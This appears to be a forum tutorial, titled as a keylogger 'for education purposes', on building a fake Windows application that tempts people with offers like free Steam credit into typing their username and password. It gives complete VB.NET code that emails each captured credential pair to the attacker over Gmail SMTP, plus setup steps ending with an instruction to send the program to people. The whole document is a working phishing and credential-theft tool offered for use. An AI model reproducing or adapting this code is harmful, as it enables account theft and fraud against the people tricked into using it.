Key Logger Application... For "education" purposes of course..



Note: This is a application based Keylogger, I use Microsoft Visual Studio Express 2013 for this..


Purpose: Set up a "Fake" Application to have someone enter their username and password then it will send an email to you with what they have typed in. Usually you want to entice them with an offer like free Steam Credit or Free RP here is an example of how it looks....

Example Image


Code:
gyazo DOT com /7af6b0b017fd4d393dccc6151f7f4a63
Code:
Imports System.Net.Mail
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
            MyMailMessage.From = New MailAddress("YOUR EMAIL")
            MyMailMessage.To.Add("YOUR EMAIL")
            MyMailMessage.Subject = "Log info"
            MyMailMessage.Body = "Name: " & TextBox1.Text & " / Pass: " & TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("YOUR EMAIL", "YOUR PASSWORD")
            SMTP.Send(MyMailMessage)
        Catch ex As Exception
End Try
End Sub
End Class
Config Script.. if for some reason you need to enter it yourself
Code:
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <startup>
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
    </startup>
</configuration>
Steps: Insert Script -> Edit the application to make it look legit -> Make two title boxes with " Username " and " Password " -> Next to those put in two Text Boxes and make sure you don't edit their properties -> send this to people or test it yourself!